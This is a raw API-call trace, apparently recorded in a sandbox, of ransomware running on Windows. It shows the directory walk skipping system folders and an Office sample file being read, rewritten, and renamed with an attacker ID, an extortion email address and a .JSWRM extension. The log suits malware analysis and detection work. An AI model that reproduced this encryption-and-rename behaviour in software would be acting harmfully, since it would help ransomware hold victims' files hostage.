lpString2="windows") returned -1 [0143.854] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="recovery") returned 1 [0143.854] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="perflogs") returned 1 [0143.854] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="documents and settings") returned 1 [0143.854] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="$RECYCLE.BIN") returned 1 [0143.854] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="system volume information") returned -1 [0143.854] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="msocache") returned 1 [0143.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0143.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOLVSAMP.XLS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOLVSAMP.XLS", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOLVSAMP.XLS", lpUsedDefaultChar=0x0) returned 12 [0143.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0143.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0143.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOLVSAMP.XLS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOLVSAMP.XLS", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOLVSAMP.XLS", lpUsedDefaultChar=0x0) returned 12 [0143.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0143.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0143.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0143.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0143.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\SAMPLES\\SOLVSAMP.XLS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\samples\\solvsamp.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.856] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=118784) returned 1 [0143.856] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d000) returned 0x2501e8 [0143.857] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1d000, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x1d000, lpOverlapped=0x0) returned 1 [0143.866] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.866] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1d000, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x1d000, lpOverlapped=0x0) returned 1 [0143.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0143.867] CloseHandle (hObject=0x238) returned 1 [0143.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0143.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0143.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0143.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0143.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0143.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0143.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0143.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0143.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0143.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0143.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0143.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0143.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0143.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0143.867] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\SAMPLES\\SOLVSAMP.XLS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\samples\\solvsamp.xls"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\SAMPLES\\SOLVSAMP.XLS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\samples\\solvsamp.xls.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0143.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0143.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0143.869] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb48c20e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb48c20e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb48c20e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d000, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="SOLVSAMP.XLS", cAlternateFileName="")) returned 0 [0143.869] FindClose (in: hFindFile=0x232180 | out: hFindFile=0x232180) returned 1 [0143.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0143.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0143.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0143.869] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1db7a09, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1db7a09, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4fef2b0, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x8aa50, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SAVASWEB.DLL", cAlternateFileName="")) returned 1 [0143.869] lstrcmpiW (lpString1="SAVASWEB.DLL", lpString2=".") returned 1 [0143.869] lstrcmpiW (lpString1="SAVASWEB.DLL", lpString2="..") returned 1 [0143.869] lstrcmpiW (lpString1="SAVASWEB.DLL", lpString2="...") returned 1 [0143.869] lstrcmpiW (lpString1="SAVASWEB.DLL", lpString2="windows") returned -1 [0143.869] lstrcmpiW (lpString1="SAVASWEB.DLL", lpString2="recovery") returned 1 [0143.869] lstrcmpiW (lpString1="SAVASWEB.DLL", lpString2="perflogs") returned 1 [0143.869] lstrcmpiW (lpString1="SAVASWEB.DLL", lpString2="documents and settings") returned 1 [0143.869] lstrcmpiW (lpString1="SAVASWEB.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.869] lstrcmpiW (lpString1="SAVASWEB.DLL", lpString2="system volume information") returned -1 [0143.869] lstrcmpiW (lpString1="SAVASWEB.DLL", lpString2="msocache") returned 1 [0143.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0143.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVASWEB.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVASWEB.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAVASWEB.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0143.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0143.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVASWEB.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVASWEB.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAVASWEB.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0143.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0143.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216e30 | out: hHeap=0x1e0000) returned 1 [0143.870] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1db7a09, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1db7a09, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3ea6336, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x278e8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SAVWBHF.DLL", cAlternateFileName="")) returned 1 [0143.870] lstrcmpiW (lpString1="SAVWBHF.DLL", lpString2=".") returned 1 [0143.870] lstrcmpiW (lpString1="SAVWBHF.DLL", lpString2="..") returned 1 [0143.870] lstrcmpiW (lpString1="SAVWBHF.DLL", lpString2="...") returned 1 [0143.870] lstrcmpiW (lpString1="SAVWBHF.DLL", lpString2="windows") returned -1 [0143.870] lstrcmpiW (lpString1="SAVWBHF.DLL", lpString2="recovery") returned 1 [0143.870] lstrcmpiW (lpString1="SAVWBHF.DLL", lpString2="perflogs") returned 1 [0143.870] lstrcmpiW (lpString1="SAVWBHF.DLL", lpString2="documents and settings") returned 1 [0143.870] lstrcmpiW (lpString1="SAVWBHF.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.870] lstrcmpiW (lpString1="SAVWBHF.DLL", lpString2="system volume information") returned -1 [0143.870] lstrcmpiW (lpString1="SAVWBHF.DLL", lpString2="msocache") returned 1 [0143.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0143.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVWBHF.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVWBHF.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAVWBHF.DLL", lpUsedDefaultChar=0x0) returned 11 [0143.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0143.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0143.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVWBHF.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVWBHF.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAVWBHF.DLL", lpUsedDefaultChar=0x0) returned 11 [0143.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0143.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0143.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0143.870] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1dddc34, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1dddc34, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1e9c9a8, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x42ed0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SAVWBRAS.DLL", cAlternateFileName="")) returned 1 [0143.870] lstrcmpiW (lpString1="SAVWBRAS.DLL", lpString2=".") returned 1 [0143.870] lstrcmpiW (lpString1="SAVWBRAS.DLL", lpString2="..") returned 1 [0143.870] lstrcmpiW (lpString1="SAVWBRAS.DLL", lpString2="...") returned 1 [0143.870] lstrcmpiW (lpString1="SAVWBRAS.DLL", lpString2="windows") returned -1 [0143.870] lstrcmpiW (lpString1="SAVWBRAS.DLL", lpString2="recovery") returned 1 [0143.870] lstrcmpiW (lpString1="SAVWBRAS.DLL", lpString2="perflogs") returned 1 [0143.870] lstrcmpiW (lpString1="SAVWBRAS.DLL", lpString2="documents and settings") returned 1 [0143.870] lstrcmpiW (lpString1="SAVWBRAS.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.871] lstrcmpiW (lpString1="SAVWBRAS.DLL", lpString2="system volume information") returned -1 [0143.871] lstrcmpiW (lpString1="SAVWBRAS.DLL", lpString2="msocache") returned 1 [0143.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0143.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVWBRAS.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVWBRAS.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAVWBRAS.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0143.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0143.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVWBRAS.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVWBRAS.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAVWBRAS.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0143.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0143.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0143.871] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1dddc34, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1dddc34, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4fef2b0, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x406d0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SAVWBVML.DLL", cAlternateFileName="")) returned 1 [0143.871] lstrcmpiW (lpString1="SAVWBVML.DLL", lpString2=".") returned 1 [0143.871] lstrcmpiW (lpString1="SAVWBVML.DLL", lpString2="..") returned 1 [0143.871] lstrcmpiW (lpString1="SAVWBVML.DLL", lpString2="...") returned 1 [0143.871] lstrcmpiW (lpString1="SAVWBVML.DLL", lpString2="windows") returned -1 [0143.871] lstrcmpiW (lpString1="SAVWBVML.DLL", lpString2="recovery") returned 1 [0143.871] lstrcmpiW (lpString1="SAVWBVML.DLL", lpString2="perflogs") returned 1 [0143.871] lstrcmpiW (lpString1="SAVWBVML.DLL", lpString2="documents and settings") returned 1 [0143.871] lstrcmpiW (lpString1="SAVWBVML.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.871] lstrcmpiW (lpString1="SAVWBVML.DLL", lpString2="system volume information") returned -1 [0143.871] lstrcmpiW (lpString1="SAVWBVML.DLL", lpString2="msocache") returned 1 [0143.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0143.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVWBVML.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVWBVML.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAVWBVML.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0143.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0143.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVWBVML.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVWBVML.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAVWBVML.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0143.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0143.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0143.871] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1dddc34, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1dddc34, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x410878a, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2ac70, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SAVWBXAML.DLL", cAlternateFileName="SAVWBX~1.DLL")) returned 1 [0143.872] lstrcmpiW (lpString1="SAVWBXAML.DLL", lpString2=".") returned 1 [0143.872] lstrcmpiW (lpString1="SAVWBXAML.DLL", lpString2="..") returned 1 [0143.872] lstrcmpiW (lpString1="SAVWBXAML.DLL", lpString2="...") returned 1 [0143.872] lstrcmpiW (lpString1="SAVWBXAML.DLL", lpString2="windows") returned -1 [0143.872] lstrcmpiW (lpString1="SAVWBXAML.DLL", lpString2="recovery") returned 1 [0143.872] lstrcmpiW (lpString1="SAVWBXAML.DLL", lpString2="perflogs") returned 1 [0143.872] lstrcmpiW (lpString1="SAVWBXAML.DLL", lpString2="documents and settings") returned 1 [0143.872] lstrcmpiW (lpString1="SAVWBXAML.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.872] lstrcmpiW (lpString1="SAVWBXAML.DLL", lpString2="system volume information") returned -1 [0143.872] lstrcmpiW (lpString1="SAVWBXAML.DLL", lpString2="msocache") returned 1 [0143.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0143.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVWBXAML.DLL", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0143.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVWBXAML.DLL", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAVWBXAML.DLL", lpUsedDefaultChar=0x0) returned 13 [0143.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0143.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0143.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVWBXAML.DLL", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0143.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVWBXAML.DLL", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAVWBXAML.DLL", lpUsedDefaultChar=0x0) returned 13 [0143.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0143.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0143.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0143.872] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe1ba7093, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe1ba7093, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee308135, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd4e8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SCANPST.EXE", cAlternateFileName="")) returned 1 [0143.872] lstrcmpiW (lpString1="SCANPST.EXE", lpString2=".") returned 1 [0143.872] lstrcmpiW (lpString1="SCANPST.EXE", lpString2="..") returned 1 [0143.872] lstrcmpiW (lpString1="SCANPST.EXE", lpString2="...") returned 1 [0143.872] lstrcmpiW (lpString1="SCANPST.EXE", lpString2="windows") returned -1 [0143.872] lstrcmpiW (lpString1="SCANPST.EXE", lpString2="recovery") returned 1 [0143.872] lstrcmpiW (lpString1="SCANPST.EXE", lpString2="perflogs") returned 1 [0143.872] lstrcmpiW (lpString1="SCANPST.EXE", lpString2="documents and settings") returned 1 [0143.872] lstrcmpiW (lpString1="SCANPST.EXE", lpString2="$RECYCLE.BIN") returned 1 [0143.872] lstrcmpiW (lpString1="SCANPST.EXE", lpString2="system volume information") returned -1 [0143.872] lstrcmpiW (lpString1="SCANPST.EXE", lpString2="msocache") returned 1 [0143.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0143.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCANPST.EXE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCANPST.EXE", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCANPST.EXE", lpUsedDefaultChar=0x0) returned 11 